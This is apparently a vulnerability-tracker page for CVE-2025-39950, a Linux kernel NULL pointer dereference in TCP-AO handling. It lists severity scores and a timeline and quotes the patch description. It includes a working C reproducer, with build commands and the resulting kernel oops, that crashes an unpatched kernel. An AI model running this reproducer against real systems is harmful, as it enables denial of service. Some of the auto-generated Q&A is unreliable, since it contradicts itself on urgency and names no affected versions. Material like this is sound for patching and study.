What is the CVSS score of EUVD-2025-32392?

EUVD-2025-32392 has a CVSS 3.1 base score of 5.5 (Medium). CVSS vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H. EPSS exploitation probability: 0.0%.

Which versions of Linux Kernel are affected by EUVD-2025-32392?

CVE-2025-39950 presents moderate security risk, a null pointer dereference vulnerability rated CVSS 5.5. Exploitation could compromise the security of affected deployments.. A patch is available.

Is there a public PoC exploit available for EUVD-2025-32392?

Yes, a public proof-of-concept exploit is available for EUVD-2025-32392. Prioritise patching immediately. EPSS: 0.0%.

How to fix or mitigate EUVD-2025-32392?

Within 30 days: Identify affected systems and apply vendor patches as part of regular patch cycle. Vendor patch is available.

Linux Kernel EUVD-2025-32392

| CVE-2025-39950 MEDIUM

NULL Pointer Dereference (CWE-476)

2025-10-04 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Denial Of Service Linux Null Pointer Dereference Linux Kernel Red Hat Suse

5.5

CVSS 3.1 · NVD

Severity by source

NVD PRIMARY

5.5 MEDIUM

AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

SUSE

MEDIUM

qualitative

Primary rating from NVD.

CVSS VectorNVD

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Attack Vector

Local

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Unchanged

Confidentiality

None

Integrity

None

Availability

High

Lifecycle Timeline

EUVD ID Assigned

Mar 13, 2026 - 19:56 euvd

EUVD-2025-32392

Analysis Generated

Mar 13, 2026 - 19:56 vuln.today

PoC Detected

Jan 23, 2026 - 20:03 vuln.today

Public exploit code

Patch released

Jan 23, 2026 - 20:03 nvd

Patch available

CVE Published

Oct 04, 2025 - 08:15 nvd

MEDIUM 5.5

DescriptionCVE.org

In the Linux kernel, the following vulnerability has been resolved:

net/tcp: Fix a NULL pointer dereference when using TCP-AO with TCP_REPAIR

A NULL pointer dereference can occur in tcp_ao_finish_connect() during a connect() system call on a socket with a TCP-AO key added and TCP_REPAIR enabled.

The function is called with skb being NULL and attempts to dereference it on tcp_hdr(skb)->seq without a prior skb validation.

Fix this by checking if skb is NULL before dereferencing it.

The commentary is taken from bpf_skops_established(), which is also called in the same flow. Unlike the function being patched, bpf_skops_established() validates the skb before dereferencing it.

int main(void){ struct sockaddr_in sockaddr; struct tcp_ao_add tcp_ao; int sk; int one = 1;

memset(&sockaddr,'\0',sizeof(sockaddr)); memset(&tcp_ao,'\0',sizeof(tcp_ao));

sk = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

sockaddr.sin_family = AF_INET;

memcpy(tcp_ao.alg_name,"cmac(aes128)",12); memcpy(tcp_ao.key,"ABCDEFGHABCDEFGH",16); tcp_ao.keylen = 16;

memcpy(&tcp_ao.addr,&sockaddr,sizeof(sockaddr));

setsockopt(sk, IPPROTO_TCP, TCP_AO_ADD_KEY, &tcp_ao, sizeof(tcp_ao)); setsockopt(sk, IPPROTO_TCP, TCP_REPAIR, &one, sizeof(one));

sockaddr.sin_family = AF_INET; sockaddr.sin_port = htobe16(123);

inet_aton("127.0.0.1", &sockaddr.sin_addr);

connect(sk,(struct sockaddr *)&sockaddr,sizeof(sockaddr));

return 0; }

$ gcc tcp-ao-nullptr.c -o tcp-ao-nullptr -Wall $ unshare -Urn

BUG: kernel NULL pointer dereference, address: 00000000000000b6 PGD 1f648d067 P4D 1f648d067 PUD 1982e8067 PMD 0 Oops: Oops: 0000 [#1] SMP NOPTI Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020 RIP: 0010:tcp_ao_finish_connect (net/ipv4/tcp_ao.c:1182)

Analysis